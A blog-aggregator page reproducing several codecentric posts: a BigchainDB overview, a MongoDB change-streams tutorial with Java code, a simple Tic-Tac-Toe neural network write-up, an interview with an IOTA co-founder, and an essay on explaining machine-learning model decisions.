TDD & BDD

BigchainDB – The lightweight blockchain framework [blockcentric #5]

codecentric Blog - 18 hours 53 min ago

With BigchainDB we see one of the first complete but simple blockchain frameworks. The project strives to make blockchain usable for a large number of developers and use cases without requiring special knowledge in cryptography and distributed systems.

According to benchmarks (whose scripts are also included in the repository), a simple BigchainDB network is able to accept and validate 800 transactions per second (compared to 3-10 tx/s for Bitcoin). This high data throughput is due to the Big Data technologies chosen for data persistence. Database systems from this environment use proven mechanisms based on Paxos algorithms to reach a consensus on the state of the data.
MongoDB or RethinkDB can be selected as the underlying database for a BigchainDB. Both options are document-oriented NoSQL databases, which can be scaled horizontally through replication and sharding. They are also schema-free, so data can be stored in them without having to define a uniform global schema.
On their own, both systems are generally capable of more than 80,000 write operations per second.

Transactions in BigchainDB

The framework makes use of the consensus mechanism of the underlying database cluster. On top of that, it is possible to implement your own mechanisms to validate transactions.
Two types of transactions are available in BigchainDB. CREATE transactions create an asset, i.e. a collection of data, and link it to at least one owner (its public key). In addition, all assets are “divisible” and can therefore be broken down into different proportions for different owners.
With TRANSFER transactions, complex instructions can be created that tie existing assets (and their shares) to conditions of further transactions. In this way, assets and their shares can easily be moved between participants in the network.
As usual in a blockchain, there is no way to delete an asset or modify its properties.

For a transaction to be validly processed in the network, several conditions must be met.
Once a transaction has been received, the nodes check it for the correct structure. For example, CREATE transactions must contain their asset data, while TRANSFER transactions reference the ID of a previously created asset. Both types also differ in the way they have to deal with inputs and outputs. Of course, each transaction must be signed and hashed before it is transmitted to the network.
If the structure of a transaction is valid, the validity of the contained data is checked. In short, this step prevents the so-called “double spending”: a transaction cannot transfer the same asset repeatedly or spend assets that have already been spent by other transactions.
In addition, you can implement your own validation mechanisms that check asset creation and transfers for domain-specific correctness, for example whether realistic dimensions have been assigned to a car part or whether the color code of an automotive paint actually exists.
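
Such a check does not need any blockchain specifics. A minimal Java sketch for the car-part example could look like the following, using java.util.Map and java.util.Set; the field names and the way this would be wired into BigchainDB's validation are assumptions for illustration, not part of the framework's API:

// Illustrative domain check; "lengthMm" and "colorCode" are made-up asset fields.
static boolean isPlausibleCarPart(Map<String, Object> assetData, Set<String> knownColorCodes) {
    double lengthMm = ((Number) assetData.getOrDefault("lengthMm", -1)).doubleValue();
    String colorCode = String.valueOf(assetData.get("colorCode"));
    boolean realisticDimensions = lengthMm > 0 && lengthMm < 10_000; // no part longer than 10 m
    return realisticDimensions && knownColorCodes.contains(colorCode);
}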

For a deeper understanding of the idea as well as the technical and architectural details of the project, it is recommended to read the BigchainDB Whitepaper, which was maintained until June 2016.

Scenarios and operation of a blockchain

Since the consensus in a BigchainDB is not implemented via public mechanisms such as Proof of Work, Proof of Stake or similar, the technology is more suitable for private blockchains. This means that several parties form a consortium in order to jointly execute their transactions among themselves without the need for an intermediary. To this end, each participant of this association contributes some infrastructure on which at least one node of the blockchain solution is operated. Each transaction that occurs in the network must therefore be validated and confirmed by the technical and organizational parties of the consortium. This approach is very lightweight and does not require participants to be rewarded for their validations. The reward for the participants is, after all, a trustworthy network without questionable and costly middlemen.

Due to these circumstances, operating a private blockchain based on BigchainDB is relatively easy. Each member of the consortium must take care of setting up and maintaining a database and BigchainDB cluster distributed across its infrastructure. In addition, there is of course the holding of a private key to sign its messages to the network. Each organization participating in the network can be identified and verified via the built-in certificate management and registry.

One example would be an association of several banks that process payment transactions and exchange information among themselves. Usually, these participants do not fully trust each other and must involve third parties to verify the transactions. However, if this network of banks were to form a consortium that automates and cryptographically secures each transaction, a third instance would be superfluous and could therefore be excluded.
With a BigchainDB solution in place, each bank would operate its own cluster in its infrastructure that is linked to the network.

BigchainDB is therefore particularly suitable for private blockchain networks with high activity and data volume. The stack is also suitable for archiving solutions in which many data records have to be stored in a trustworthy way for many years. It can be used, for example, to replace systems that incur high service, hardware and license fees for legally compliant data archiving.
The BigchainDB transaction model is also an excellent fit for tracking the steps of a supply chain.

Getting started on the local machine or in IPDB

The Interplanetary Database (IPDB) is now also offered as a managed BigchainDB blockchain network, with which one can interact as a registered organization.

Locally, BigchainDB can either be installed directly on the host or run with Docker. The Docker variant is well suited for getting started and testing.

In order to develop client applications against the running network, several official and community-maintained drivers are available. With support for Python, JavaScript, Java, Ruby, Haskell and Go, every developer will probably find a suitable library.

We wish you a lot of fun trying it out.

Our article series “blockcentric” discusses Blockchain-related technology, projects, organization and business concerns. It contains knowledge and findings from our 20% time work, but also news from the area.

We are looking forward to your feedback on the column and exciting discussions about your use cases.

Previously published blockcentric-Posts

The post BigchainDB – The lightweight blockchain framework [blockcentric #5] appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Change Streams in MongoDB 3.6

codecentric Blog - Sun, 14-Jan-18 23:00

MongoDB 3.6 introduces an interesting API enhancement called change streams. With change streams you can watch for changes to certain collections by means of the driver API. This feature replaces all the custom oplog watcher implementations out there, including the one I used in the article on Near-Realtime Analytics with MongoDB.

For a start, we need to install MongoDB 3.6.0 or a higher version. After setting up a minimal replica set, we connect to the primary and set the feature compatibility to 3.6 to be able to use change streams (this will hopefully be the default in future versions):

use admin
db.adminCommand( { setFeatureCompatibilityVersion: "3.6" } )

I will use the Java driver for the following examples. In order to be able to watch for document changes, we write a simple program that inserts a bunch of documents into a collection test.events:

MongoCollection<Document> eventCollection =
    new MongoClient(
        new MongoClientURI("mongodb://localhost:27001,localhost:27002,localhost:27003/test?replicaSet=demo-dev")
    ).getDatabase("test").getCollection("events");

long i = 0;
while (true) {
  Document doc = new Document();
  doc.put("i", i++);
  doc.put("even", i%2);
  eventCollection.insertOne(doc);
  System.out.println("inserted: " + doc);
  Thread.sleep(2000L + (long)(1000*Math.random()));
}

The output of this Java process looks like this:

inserted: Document{{i=1, even=0, _id=5a31187a21d65707e8282fa7}}
inserted: Document{{i=2, even=1, _id=5a31187d21d65707e8282fa8}}
inserted: Document{{i=3, even=0, _id=5a31187f21d65707e8282fa9}}
inserted: Document{{i=4, even=1, _id=5a31188121d65707e8282faa}}
...

In another Java process, we use the same code for retrieving the collection. On that collection we call a method watch which takes a list of aggregation stages, just like the aggregate operation:

ChangeStreamIterable<Document> changes = eventCollection.watch(asList(
    Aggregates.match( and( asList(
      in("operationType", asList("insert")),
      eq("fullDocument.even", 1L)))
  )));

We register only for insert operations on the collection and additionally filter for documents with the field even being equal to 1.


When we iterate over the cursor we just print out the matching documents:

changes.forEach(new Block<ChangeStreamDocument<Document>>() {
  @Override
  public void apply(ChangeStreamDocument<Document> t) {
    System.out.println("received: " + t.getFullDocument());
  }
});

The result looks like this:

received: Document{{_id=5a311e2021d657082268f38a, i=2, even=1}}
received: Document{{_id=5a311e2521d657082268f38c, i=4, even=1}}
received: Document{{_id=5a311e2a21d657082268f38e, i=6, even=1}}
...

With change streams, the MongoDB API grows even wider. Now you can quite easily build things that resemble triggers you know from traditional databases. There is no need for external event processing or your own oplog watcher implementation anymore.
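
Change streams are also resumable: every change document carries a resume token that allows you to continue where you left off. A minimal sketch, assuming the token is simply kept in a variable instead of being persisted durably, could look like this:

MongoCursor<ChangeStreamDocument<Document>> cursor = eventCollection.watch().iterator();
BsonDocument resumeToken = null;
while (cursor.hasNext()) {
  ChangeStreamDocument<Document> event = cursor.next();
  resumeToken = event.getResumeToken();   // store this token durably in a real setup
  System.out.println("received: " + event.getFullDocument());
}

// after a crash or restart, continue from the last processed event:
MongoCursor<ChangeStreamDocument<Document>> resumed =
    eventCollection.watch().resumeAfter(resumeToken).iterator();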

The full source code can be found at GitHub.

The post Change Streams in MongoDB 3.6 appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Gamma-TicTacToe – Neural Network and Machine Learning in a simple game

codecentric Blog - Fri, 12-Jan-18 06:52

This post is about implementing a – quite basic – Neural Network that is able to play the game Tic-Tac-Toe. For sure there is not really a need for any Neural Network or Machine Learning model to implement a good – well, basically perfect – computer player for this game. This could be easily achieved by using a brute-force approach. But as this is the author’s first excursion into the world of Machine Learning, opting for something simple seems to be a good idea.

Motivation

The motivation to start working on this post and the related project can be comprised in one word: AlphaGo. The game of Go is definitely the queen of competitive games. Before the age of AlphaGo it was assumed that it would take a really long time until any computer program could beat the best human players, if ever. But unlike the predominant chess programs, AlphaGo is based on some super-advanced – the word really fits here – Neural Network implementation. With this it simply swept away any human top player in the world. Depending on the viewpoint this is amazing, sad, scary or a bit of all.

If this is about the game of Go then why is there a video embedded about playing chess? The engine behind AlphaGo has been developed further. Its latest incarnation is called AlphaZero and it is so generic that it can teach itself different games based only on the rules. There is no human input required anymore, but learning is completely performed using self-play. This is really fascinating, isn’t it? AlphaZero had already easily defeated all its predecessors in the game of Go when it was trained to conquer the world of chess. After only four hours (!) of self-training it crushed the best chess engine around, which in turn would beat any human chess player.

So much for the motivation to start this project, which obviously cannot – and is not intended to – even scratch the surface of what has been achieved with AlphaZero. The project name, though, is clearly inspired by it ;-).

Objectives

Then what should be achieved? Learning about and implementing a Neural Network with some kind of self-learning approach, to start with. As the rules of Tic-Tac-Toe are very simple – just play on an empty field – not too much time needs to be spent on the game mechanics as such. This allows focusing on the Neural Network and the learning approach.

Ideally the program should play the game perfectly in the end. This would mean it will never lose to any human player and will win if that player does not play the best moves. Tic-Tac-Toe cannot be won by either player if both are playing decent moves.

The basic – and a little bit less ambitious – objective is that it wins a fair amount of games when playing against a random computer player after some amount of self-learning.

Playing a random computer player

Playing a random computer player is the first assessment of what has been achieved. Then we are going to take a closer look at the implementation, the ideas that did not work and the ideas that worked out in the end.

The complete implementation of Gamma-Tic-Tac-Toe can be found here: https://github.com/ThomasJaspers/gamma-tic-tac-toe. That page also includes instructions on how to compile and run it.

Self-play against the random computer player is implemented in a way that allows independent matches with any number of games. The Neural Network is re-initialized and trained again between two matches. By default each match consists of 10,000 games and 50 matches are performed. All these values are configurable. The number of training games is of course also configurable, as it is an interesting parameter for testing the ability of the Neural Network to learn.

random-vs-random

The match between two random computer players is used to cross-check the implementation. It is expected that the results are almost completely even, as can also be seen in the following chart.

It is easy to make mistakes when validating the results using self-play. In the beginning the Neural Network was always making the first move. Of course, in a game like Tic-Tac-Toe this led to wrong results. With two random computer players playing the game, this could be detected, as it was quite suspicious that one random player was winning far more often than the other one.

chart showing the results of two random players

gamma0-vs-random

The next match is the random computer player vs. an untrained gamma-engine (the fancy name used instead of writing “the Neural Net playing Tic-Tac-Toe”). This is interesting as the matches are going back and forth, but without a clear overall winner or loser. The individual matches are often won quite clearly in comparison to the games played between two random computer players.

chart showing the results of a random computer player vs. an untrained gamma-engine

gamma50-vs-random

Now we have a gamma-engine that is trained in 50 games against the random computer player before each match. It can be seen that the number of matches won clearly increases in comparison to the untrained version. But quite a few matches are still lost, sometimes even pretty clearly.

chart showing results of a trained gamma-engine

gamma250-vs-random

With 250 training games things improve a lot. All but one match are won, and often quite clearly.

chart showing results of an increasingly trained gamma-engine

gamma500-vs-random

Interestingly the results are pretty much the same as with 250 training runs. This time even two matches are lost. Still it is obvious that the training has a positive effect on playing.

chart showing results from a gamma-engine with 500 trained games

gamma1500-vs-random

So let’s perform 1500 training games before each match. The result is again not changing dramatically, but there is still some improvement.

charts showing some improvement after 1500 training games

gamma15000-vs-random

Finally, let's make a huge jump to 15,000 training runs before each match. With this amount of training the Neural Network is winning very consistently and at a high level. This result has been double-checked by executing it several times. The same is true for the other results as well.

chart showing high winning rate after 15000 training runs

The journey to gamma-engine stage-1

The results presented in the previous chapter are based on stage-1 of the gamma-engine. The different stages are intended to differ in the amount of learning that is applied. This is not related to the number of training runs, but to the factors used to learn something about the game. In stage-1 the “learning algorithm” is based on the following rule: if a game is won, the first and the last move of that game are “rewarded”.

This “rewarding of the right decisions” is a kind of backpropagation, which is often used to train Neural Networks, even though what has been done here is a bit simpler than what is described in that article.

Therefore the output weights of the corresponding neurons triggering those moves are increased. This does not seem to be a lot of learning at all, but it is enough for the results shown above. Of course this is only possible due to the fact that Tic-Tac-Toe is such a trivial game to play.
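
In code, this stage-1 reward can be sketched as simply as this (the method and parameter names are illustrative and not taken from the repository):

// Stage-1 "learning": after a won game, nudge the output weights of the neurons
// that triggered the first and the last move of that game upwards.
static void rewardWin(double[] outputWeights, int firstMove, int lastMove, double learningRate) {
    outputWeights[firstMove] += learningRate;
    outputWeights[lastMove] += learningRate;
}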

There are a lot of articles dealing with Neural Networks and Machine Learning. The corresponding Wikipedia page for example is quite extensive. Therefore this article is focusing on the practical approach towards the specific problem at hand and not so much on the theoretical side of Neural Networks. Still we need some theoretical background to start with.

A Neural Network is composed of different layers. It has an input layer, any number of hidden layers and an output layer. Theoretically each layer can have any number of neurons. But the number of input and output nodes is determined by the data and the task at hand. Thus, in practice, only hidden layers can have an arbitrary number of nodes. In this implementation dense layers are used, where each neuron of one layer is connected to each neuron of the next layer. There are lots of other layer types where this is not the case. The input to a neuron is an input value representing (a part of) the task to be solved and a weight assigned to that connection. By modifying those weights the Neural Network can learn. The following diagram shows an example of such a Neural Network.

Different layers of a Neural Network

The input layer and the output layer are defined by the values to be processed and the result to be produced. It is pretty clear that there will be one output neuron as we need to generate one move in the end. That move will be the output of that single output neuron.

For the input neurons things are not that straightforward. It is clear that the game state must be passed to the input neurons. At first sight, the different possible board representations after making each valid move were considered as the input. But it is hard to do something meaningful with this in the hidden layer. Furthermore, the input neurons would have different semantics every time, which makes learning difficult. The next idea was to map one field from the board to one input neuron. That worked to some extent. The final solution has three input neurons for each field on the board, representing the possible field states: empty, occupied by the computer player, and occupied by the opponent. With this approach it is important that the same field – with its corresponding state – is assigned to the same input neuron every time. This is depicted in the following diagram.

Input Layer with 27 Input Neurons

In addition, an input value is required for each neuron. It is defined based on the field and on whether that field is empty, occupied by the computer player, or occupied by the opponent.
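
A possible encoding of this input layer, sketched here with assumed data structures rather than the project's actual classes:

// 27 input neurons, three per field: index 3 * field + state,
// where state is 0 = empty, 1 = computer player, 2 = opponent.
static double[] encodeBoard(int[] board) {
    double[] input = new double[27];
    for (int field = 0; field < 9; field++) {
        input[3 * field + board[field]] = 1.0; // exactly one of the three neurons per field is active
    }
    return input;
}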

Neurons in the hidden layer calculate a “positional score” for the candidate moves, based on the field values and the input weights. Each neuron in the hidden layer always represents exactly one move to a certain field on the board.

In the beginning every neuron in the hidden layer was calculating a candidate move out of all possible moves. But this approach felt too much like an algorithmic solution through the backdoor.

That’s why there are nine neurons in the hidden layer, as there is at any time a maximum of nine possible moves.

Nine neurons in the hidden layer

Thus the first neuron in the hidden layer stands for a move on the first field, neuron two for a move on the second field, and so on. This implies that some neurons cannot “fire” a valid move because the corresponding field is already occupied. This is the equivalent of a threshold that decides whether or not a neuron is activated (fires). If no neuron in the hidden layer can be activated, the game is over anyway, as there are no valid moves left.

Activation functions

Activation functions are a vital part of any Neural Network implementation. They are using input values and input weights to calculate output values. Those are the input to the neurons of the next layer or the result computed by the Neural Network. Common to all layers is the randomized generation of output weights when the Neural Network is (re-)initialized. All neurons of one layer are sharing the same implementation of the activation function.

input layer

The activation function of this layer is rather simple. It stores the field information that it has retrieved as an input. Based on this it calculates a value depending on the field state and location on the board. Basically this includes a kind of threshold function. Only one of the three neurons reflecting one field is used as an input in the hidden layer.

hidden layer

For each neuron in the hidden layer a so-called position value is calculated based on the input weights and values. This is done by applying the formula below, which sums over all input neurons, so that the complete board state is taken into account.

For every set of input neurons reflecting the same field, the input weight and value of exactly one neuron is used, depending on whether the field is empty, owned by the computer or owned by the opponent. Thus, of the 27 input neurons, only the nine relevant ones are used for this calculation.

Z = ∑ FIELD_VALUE * INPUT_WEIGHT 

Then the sigmoid function is applied to Z. The sigmoid function is quite commonly used in activation functions of Neural Networks.

S(Z) = 1 / (1 + e^(-Z))

The resulting value is the positional score for this neuron and thus this candidate move.

output layer

In the output layer a value Z is calculated again. But this time it is not a sum; it is calculated separately for each candidate move.

Z = POSITION_VALUE * INPUT_WEIGHT

Then again the sigmoid function is applied to Z. The candidate move where S(Z) is the maximum is chosen as the move to execute.
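
Putting hidden and output layer together, the move selection described above can be sketched roughly like this; the data layout and all names are assumptions for illustration, not the project's actual code:

// board[field]: 0 = empty, 1 = computer player, 2 = opponent
// inputWeights[move][3 * field + state]: weight of the input neuron for (field, state)
// outputWeights[move]: weight between hidden neuron "move" and the single output neuron
static int selectMove(int[] board, double[][] inputWeights, double[] outputWeights) {
    int bestMove = -1;
    double bestScore = Double.NEGATIVE_INFINITY;
    for (int move = 0; move < 9; move++) {
        if (board[move] != 0) continue; // occupied field: this hidden neuron cannot fire
        double z = 0.0;
        for (int field = 0; field < 9; field++) {
            z += 1.0 * inputWeights[move][3 * field + board[field]]; // FIELD_VALUE assumed to be 1.0 here
        }
        double positionValue = 1.0 / (1.0 + Math.exp(-z)); // sigmoid of the weighted sum
        double s = 1.0 / (1.0 + Math.exp(-(positionValue * outputWeights[move])));
        if (s > bestScore) {
            bestScore = s;
            bestMove = move;
        }
    }
    return bestMove; // -1 means no valid move is left
}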

Summary and Outlook

This has been one of the most fun projects for quite some time. Not having any idea where to start was a really interesting experience. Playing around with different parameters like number of neurons and weight changes applied and then seeing how this affects the outcome of playing the game was really fascinating.

Luckily there is still plenty of room for improvement. First of all, a more thorough training algorithm can be applied, like rewarding all moves that lead to a win and not only the first and the last one. Another idea is to decrease the output weights of neurons whose moves have led to a loss.

Then the structure of the Neural Network can be evolved by introducing additional hidden layers and thus increasing the number of neurons and connections between those.

Pretty sure there will be a follow-up to this blog post as one of the main objectives is not yet achieved: A Neural Network that learns to play Tic-Tac-Toe flawlessly :).

The post Gamma-TicTacToe – Neural Network and Machine Learning in a simple game appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Interview with IOTA Co-Founder Dominik Schiener [blockcentric #4]

codecentric Blog - Thu, 11-Jan-18 01:29

Dominik Schiener is one of the co-founders of IOTA – a German non-profit organization that implements a completely new Distributed Ledger Technology competing with blockchain. I talked to Dominik about his early days in the world of Distributed Ledger Technologies, Tangle technology, the IOTA ecosystem, and the future.

Jannik Hüls: Thank you for your time. You are traveling a lot. Where am I catching you right now?

Dominik Schiener: I’m in the headquarters of Deutsche Telekom in Bonn. We are set up internationally, which involves a lot of traveling. We have offices in Berlin, Oslo, Chicago, and are in the process of opening one in Singapore.

Let’s talk about your history: The world of Distributed Ledger Technologies (DLT) is not that old yet. When was your first encounter with that topic – how did you hear about blockchain?

My first point of contact was in 2011, when I came across the Bitcoin whitepaper and tried to understand it. Back then, I was 14 or 15 years old, my English was not that good yet, and I didn’t fully grasp the concept. But I was quickly fascinated – I’ve always been the curious type – so that I have worked on it full time since 2012. I started by mining. Everyone kept telling me this was how you made big money, and of course that’s why I was really ambitious from the outset. I wanted to become an entrepreneur and started my own projects at the age of 14. With AWS credits I mined and thus earned quite a lot of money. I then used this money to implement my first own projects.

So basically mining was your main field of application. Or did you actually implement something back then, did you see other options besides cryptocurrencies?

The main focus back then was on cryptocurrency. It was not until 2013 that I really understood the value added, applications that are interesting not just from a financial point of view, but where blockchain itself creates added value.

Before we talk about IOTA: currently, the topic of DLT covers a wide range of things. To you, what defines a use case that lends itself to applying DLT?

If we look at time-to-implement or time-to-market, a blockchain solution for supply chain management is the one most likely to be integrated within the next two to five years. In supply chains, it creates the greatest added value. Thanks to the underlying transparency, we can identify inefficient processes and improve things like insurance.

“A blockchain solution for supply chain management is the one most likely to be integrated within the next two to five years.”

Tangle is the foundation of IOTA. How did the idea for the Tangle come about?

Since we had a startup developing new hardware for IoT, or Fog Computing, to be precise, the basic idea was to have the machines pay each other – machine payments to buy and sell resources. Since we are also blockchain experts, our technical know-how was good enough to realize that none of the existing blockchain architectures were able to cater to the demands of the IoT space. Many had fundamental technical flaws and were too slow or too costly. So we did some research on Directed Acyclic Graphs to solve the existing problems. We did the mathematical proofs, and that's how we developed IOTA.

Can you briefly outline the differences between IOTA and blockchain?

There are two major differences: The architecture is no longer a chain, but a Directed Acyclic Graph. And the way consensus is reached is different: [with blockchain,] miners use the Competitive Proof of Work or another consensus algorithm that validates transactions in cycles. In IOTA there are no cycles like in blockchain. When transactions are executed in IOTA, two older transactions must be confirmed. There are no more miners, but whenever someone in the network performs a transaction, they also contribute to the consensus of the network, which is one of the main benefits.

Another advantage is scalability. IOTA scales horizontally: the more network participants, the faster transactions are confirmed. Plus, there are no transaction fees because there are no miners left to substitute. This means that no expenses have to be paid because everyone participates in the validation process. Other benefits include partition tolerance and the fact that quantum computers can no longer attack our hashes.

You mentioned the IoT as possible use case – is there a difference between Full Nodes and Small Nodes? Does every IoT device need to store the entire tangle? And how big is it when it’s stored?

Right now there are only Full Nodes, but we are also developing Light Nodes and Small Nodes. Small Nodes are clusters of devices that are combined. In this cluster, they will use a Full Node that meets, for example, the more demanding requirements. However, these very questions depend very much on the architecture of future systems. So, what do they really look like in the future? How do the IoT devices interact?

That’s why the concept of Fog Computing is so relevant to us. The interesting thing about IOTA is that you can really outsource all processes that are involved in running a transaction to different devices. Every IoT device can have its own signature, which means: every IoT device can have a wallet. Even my coffee machine. The second step is Tip Selection. IOTA can find two transactions that need to be confirmed. For that I have to be a Full Node or a Light Node. This Tip Selection algorithm can then really be executed by the node, and thus the coffee machine can also make a transaction by interacting with the Full Node. We imagine this as a SmartHub within our own four walls. The final process is the proof of work, which is a bit more computation-intensive. That’s why we work on special hardware – especially for Fog Computing.

You said that the big advantage of IOTA is that there are no transaction costs. What’s the incentive for the miner then – why should I run a Full Node?

That’s one of the biggest misconceptions: There is no incentive to run a Full Node in Bitcoin and Ethereum. A Full Node is not necessarily a miner. There are about 5,000 to 6,000 Full Nodes in Bitcoin, but only a small fraction of these Full Nodes are miners. The advantage of IOTA is that the effort related to the validation process is much lower compared to Ethereum or Bitcoin. This means it’s better to run an IOTA Full Node than a Bitcoin or Ethereum Full Node. A node runs to be able to participate in the network.

“The advantage of IOTA is that the effort related to the validation process is much lower compared to Ethereum or Bitcoin. This means it’s better to run an IOTA Full Node than a Bitcoin or Ethereum Full Node.”

In terms of business organization, IOTA deliberately sets itself apart from other DLT startups. You are a German non-profit organization. What’s the rationale behind this step?

It was of course a strategic move. We realized that the potential of the technology is simply too big to be limited by patents – that’s a conflict of interest. This is why this foundation idea makes so much sense, because the base layer, i.e. IOTA, should be free to use and open source. It should be used as widely as possible. In our opinion, the foundation is the best way to promote adoption. That’s why non-profit makes sense. Our goal is to bring together big companies, startups, and governments to build an ecosystem and invest. Since it is agnostic and independent, other companies are very interested in working with us rather than, for example, IBM.

Initially you also did an ICO [Initial Coin Offering], but you sold all IOTA tokens. How is the foundation funded?

We sold 100 percent of the tokens, then said to the community: if you want a foundation, you’ll need to donate money. As a result, the community got together and donated five percent of the tokens, which currently makes up about 200 million Euros. This is how the foundation is funded.

In other words, the value of the currency IOTA is also fundamental to the financial resources of the foundation.

Exactly. Now we bring companies on board, who then donate to the foundation. And we work with governments.

For example, the Data Marketplace is currently implementing a use case based on IOTA. There, data can be paid with micropayment.

Interesting. How do you explain the volatility of the market? How can I sell this use case better? When I buy something today, it costs, let’s say, 1000 IOTAs, which is perhaps 5 Euros, and tomorrow it might cost 50 Euros.

This is one of the biggest problems in IOTA and one of the biggest problems of cryptocurrencies in general. Volatility is in direct conflict with usability. One could think about an additional layer in which the use of the cryptocurrency is abstracted and that allows for payment in Euros, for example. However, our vision for IOTA is that the tokens are actually used. With other cryptocurrencies, the token is useless. We do not want a network in which each institution maintains its own token. This leads to a way too fragmented ecosystem. Nevertheless, the usability of the token is problematic and remains an unresolved issue.

Currently there are a lot of news about you after you announced Masked Authentication Messaging, Payment Channels, the Data Marketplace, and many other things. Can you roughly tell us what direction you are headed in? I assume you have more things in the pipeline.

We focus on the announcements, especially the partnerships we start with big companies. There, we are able to integrate IOTA into large-scale existing ecosystems. This is how we really get a scaling effect – where we can deploy thousands of nodes. But I can’t say more about this right now.

At codecentric, we are developers. Are there any SDKs [Software Development Kits] for IOTA?

As a matter of fact, we are working on this, especially for the modules that we develop. In terms of IOTA development, we are currently at the point where we have the IRI client to join the network and execute the transactions. Over the past few months, we’ve been working on a completely new system architecture which implements microservices and which is enterprise-oriented. You see, right now we just have one monolithic block, just as Ethereum or Bitcoin.

In addition, the IRI client is becoming much more modular. So as a company you can decide what communication protocol you want to use, and what database, be it SAP Hana or Redis. This really is the future of IOTA and it will be one of the best releases ever. Hopefully it’ll come in February, right now it’s still being developed and thoroughly tested.

There is a sandbox and a test net for developers. Are these the best ways to validate a proof of concept, or what’s the easiest way to go?

We are presently improving the entire sandbox environment. Our goal is that developers only need to send out an API call, and we then take care of the deployments. We are currently cooperating with some companies because they are so interested in IOTA that they also help the network by managing the deployments.

Looking at the Data Marketplace as use case for application developers: what is really stored in the Tangle? Or is it just about paying for the sensor data? Can you roughly outline the architecture?

Of course, the sensor data are represented in the Tangle. In IOTA, a transaction can contain about 1.2 kilobytes of data. In other words, if I have a sensor just for temperature logging or a small dataset, I can use IOTA for data transfer. This is how IOTA also ensures the integrity of the data. If someone wants to buy the data of a sensor, this will be billed directly by micropayment. The data is then not read from the sender, but from the Tangle.

So basically the sensor pushes data into the Tangle, and I as a consumer can use the data from the Tangle to read sensor data. Pretty cool.

Finally, to reiterate: you talked about the IRI earlier. I’ve already seen that’s open source. What else is?

Everything. The Data Marketplace will also be open source. We also want to make other use cases, such as SatoshiPay, available to the community. We are not done with that, though, we are still working on it.

Thank you for your time. Cool stuff you’re working on, and fun to follow. Have a great time in Bonn!

 

Thank you, Jannik!

 

The interview was conducted in German and then translated into English.

Our article series “blockcentric” discusses Blockchain-related technology, projects, organization and business concerns. It contains knowledge and findings from our 20% time work, but also news from the area.

We are looking forward to your feedback on the column and exciting discussions about your use cases.

Previously published blockcentric-Posts

The post Interview with IOTA Co-Founder Dominik Schiener [blockcentric #4] appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Looking beyond accuracy to improve trust in machine learning

codecentric Blog - Tue, 09-Jan-18 04:00

Traditional machine learning workflows focus heavily on model training and optimization; the best model is usually chosen via performance measures like accuracy or error and we tend to assume that a model is good enough for deployment if it passes certain thresholds of these performance criteria. Why a model makes the predictions it makes, however, is generally neglected. But being able to understand and interpret such models can be immensely important for improving model quality, increasing trust and transparency and for reducing bias. Because complex machine learning models are essentially black boxes and too complicated to understand, we need to use approximations to get a better sense of how they work. One such approach is LIME, which stands for Local Interpretable Model-agnostic Explanations and is a tool that helps understand and explain the decisions made by complex machine learning models.

Accuracy and Error in Machine Learning

A general Data Science workflow in machine learning consists of the following steps: gather data, clean and prepare data, train models and choose the best model based on validation and test errors or other performance criteria. Usually we – particularly we Data Scientists or Statisticians who live for numbers, like small errors and high accuracy – tend to stop at this point. Let’s say we found a model that predicted 99% of our test cases correctly. In and of itself, that is a very good performance and we tend to happily present this model to colleagues, team leaders, decision makers or whoever else might be interested in our great model. And finally, we deploy the model into production. We assume that our model is trustworthy, because we have seen it perform well, but we don’t know why it performed well.

In machine learning we generally see a trade-off between accuracy and model complexity: the more complex a model is, the more difficult it will be to explain. A simple linear model is easy to explain because it only considers linear relationships between the predictor variables and the response. But since it only considers linearity, it won't be able to model more complex relationships and the prediction accuracy on test data will likely be lower. Deep Neural Nets are on the other end of the spectrum: since they are able to deduce multiple levels of abstraction, they are able to model extremely complex relationships and thus achieve very high accuracy. But their complexity also essentially makes them black boxes. We are not able to grasp the intricate relationships between all features that lead to the predictions made by the model, so we have to use performance criteria, like accuracy and error, as a proxy for how trustworthy we believe the model is.

Trying to understand the decisions made by our seemingly perfect model usually isn’t part of the machine learning workflow.
So why would we want to invest the additional time and effort to understand the model if it’s not technically necessary?

One way to improve understanding and explain complex machine learning models is to use so-called explainer functions. There are several reasons why, in my opinion, model understanding and explanation should become part of the machine learning workflow with every classification problem:

  • model improvement
  • trust and transparency
  • identifying and preventing bias

Model Improvement

Understanding the relationship between features, classes and predictions, and thereby why a machine learning model made the decisions it made and which features were most important for those decisions, can help us decide whether the model makes intuitive sense.

Let’s consider the following poignant example from the literature: we have a deep neural net that learned to distinguish images of wolves from huskies [1]; it was trained on a number of images and tested on an independent set of images. 90 % of the test images were predicted correctly. We could be happy with that! But what we don’t know without running an explainer function is that the model based its decisions primarily on the background: wolf images usually had a snowy background, while husky images rarely did. So we unwittingly trained a snow detector… Just by looking at performance measures like accuracy, we would not have been able to catch that!

Having this additional knowledge about how and based on which features model predictions were made, we can intuitively judge whether our model is picking up on meaningful patterns and if it will be able to generalize on new instances.

Trust and Transparency

Understanding our machine learning models is also necessary to improve trust and provide transparency regarding their predictions and decisions. This is especially relevant given the new General Data Protection Regulation (GDPR) that will go into effect in May of 2018. Even though it is still hotly discussed whether its Article 22 includes a “right to explanation” of algorithmically derived decisions [2], it probably won't be acceptable for much longer to have black box models making decisions that directly affect people's lives and livelihoods, like loans [3] or prison sentences [4].

Another area where trust is particularly critical is medicine; here, decisions will potentially have life-or-death consequences for patients. Machine learning models have been impressively accurate at distinguishing malignant from benign tumors of different types. But as the basis for (no) medical intervention we still require a professional's explanation of the diagnosis. Providing the explanation for why a machine learning model classified a certain patient's tumor as benign or malignant would go a long way to help doctors trust and use machine learning models that support them in their work.

Even in everyday business, where we are not dealing with quite so dire consequences, a machine learning model can have very serious repercussions if it doesn’t perform as expected. A better understanding of machine learning models can save a lot of time and prevent lost revenue in the long run: if a model doesn’t make sensible decisions, we can catch that before it goes into deployment and wreaks havoc there.

Identifying and Preventing Bias

Fairness and bias in machine learning models is a widely discussed topic [5, 6]. Biased models often result from biased ground truths: if the data we use to train our models contains even subtle biases, our models will learn them and thus propagate a self-fulfilling prophecy! One such (in)famous example is the machine learning model that is used to suggest sentence lengths for prisoners, which obviously reflects the inherent racial bias of the justice system [4]. Other examples are models used for recruiting, which often show the biases our society still harbors in terms of gender associations with specific jobs, like male software engineers and female nurses [5].

